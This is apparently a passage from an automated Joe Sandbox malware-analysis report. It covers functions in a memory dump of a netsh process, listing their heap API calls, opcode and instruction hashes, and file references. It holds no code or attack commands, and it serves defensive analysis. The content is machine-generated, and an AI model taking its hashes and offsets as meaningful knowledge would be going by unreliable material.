              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$AllocProcess
              • String ID:
              • API String ID: 1617791916-0
              • Opcode ID: 631cff4eda95c2459fb754251c44db7641b9b8c66f01203d7e5b70c3fa332863
              • Instruction ID: da4270bead903f881f7c13dc9ccee59e8a7b6b890002de6a32cfc13e19d673c9
              • Opcode Fuzzy Hash: 631cff4eda95c2459fb754251c44db7641b9b8c66f01203d7e5b70c3fa332863
              • Instruction Fuzzy Hash: 8611A336600215AFCB219F68D44DB8E7BADFB85365F114529F515CF294EA74AC0487A0
              Function 015623BB Relevance: 5.0, APIs: 4, Instructions: 39memoryCOMMON
              Download Yara Rule
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015623E4
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015623EB
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 015623FA
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01562401
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$FreeProcess
              • String ID:
              • API String ID: 3859560861-0
              • Opcode ID: a184ae0f57a6df1372452554e995cd8a509d656b3a9c35ffdee4aa0f69c0a172
              • Instruction ID: 0e92385aeb28a91595724fd956908a9ae94167363f91be526afb59fc857ff859
              • Opcode Fuzzy Hash: a184ae0f57a6df1372452554e995cd8a509d656b3a9c35ffdee4aa0f69c0a172
              • Instruction Fuzzy Hash: 9EF0C272A211109BD7324F6AE80DA6A7A2DBF41735F168019F45D8F281C3309842DBE0
              Function 01565A64 Relevance: 5.0, APIs: 4, Instructions: 26memoryCOMMON
              Download Yara Rule
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,01565B32,?,?,00000000,?,01565D0B,?), ref: 01565A78
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,01565B32,?,?,00000000,?,01565D0B,?), ref: 01565A7F
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,01565B32,?,?,00000000,?,01565D0B,?), ref: 01565A8D
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,01565B32,?,?,00000000,?,01565D0B,?), ref: 01565A94
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$FreeProcess
              • String ID:
              • API String ID: 3859560861-0
              • Opcode ID: 9ab7804b407131e4aa6af31156c48982408ecc334eaa29226ea040a2c0b7473a
              • Instruction ID: e2071918d1a62a1c726fab2ae7fcf62933fc553888e1854b4b618f98981ac662
              • Opcode Fuzzy Hash: 9ab7804b407131e4aa6af31156c48982408ecc334eaa29226ea040a2c0b7473a
              • Instruction Fuzzy Hash: C6E08673630222ABD7211AF9788DF8BAE5DEBC4677F020025F71DDA044CAB144099BB0